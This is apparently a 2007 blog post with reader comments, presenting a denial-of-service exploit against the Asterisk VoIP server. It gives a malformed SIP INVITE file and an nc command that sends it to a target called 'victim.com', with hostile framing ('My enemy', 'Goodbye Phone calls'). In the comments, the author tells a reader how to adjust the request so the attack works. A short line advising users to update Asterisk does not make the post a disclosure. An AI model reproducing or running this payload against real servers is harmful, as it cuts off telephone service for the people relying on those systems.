$cat sipreq.txt
INVITE\r\n
Via: SIP/2.0/UDP asterisk.server.pt;branch=z9hG5bG796asdhds Max-Forwards: 70
To: My enemy <sip:enemy@victim.com>
From: Myself <sip:myself@server.pt>;tag=1928305734
Call-ID: c84b4a76e68790@asterisk.server.pt
CSeq: 314159 INVITE
Contact: <sip:myself@server.pt>
Content-Type: application/sdp
Content-Length: 147
$nc -u victim.com 5060 < sipreq.txt
Goodbye Phone calls. I know that the protocol says:
"A Request-Line contains a method name, a Request-URI, and the protocol version separated by a single space (SP) character.",
but asterisk's coders should be aware to treat this null pointers when a bad formed request is made.
Update your asterisk software.
"The world spreads it's legs for another star, burn it out before it grows"
View Comments
Asterisk DoS
Tue Mar 13 18:01 2007
Braceta
Wed Mar 14 23:06 2007
Doesn't work.. :)
Thu Mar 15 10:01 2007
Which asterisk version do you have?
Btw, if you just copy paste my SIP request it's natural that doesn´t work, you have to do some lite changes to became valid. For example the Content-Length number isn´t correct with the package payload's length.
Btw, if you just copy paste my SIP request it's natural that doesn´t work, you have to do some lite changes to became valid. For example the Content-Length number isn´t correct with the package payload's length.
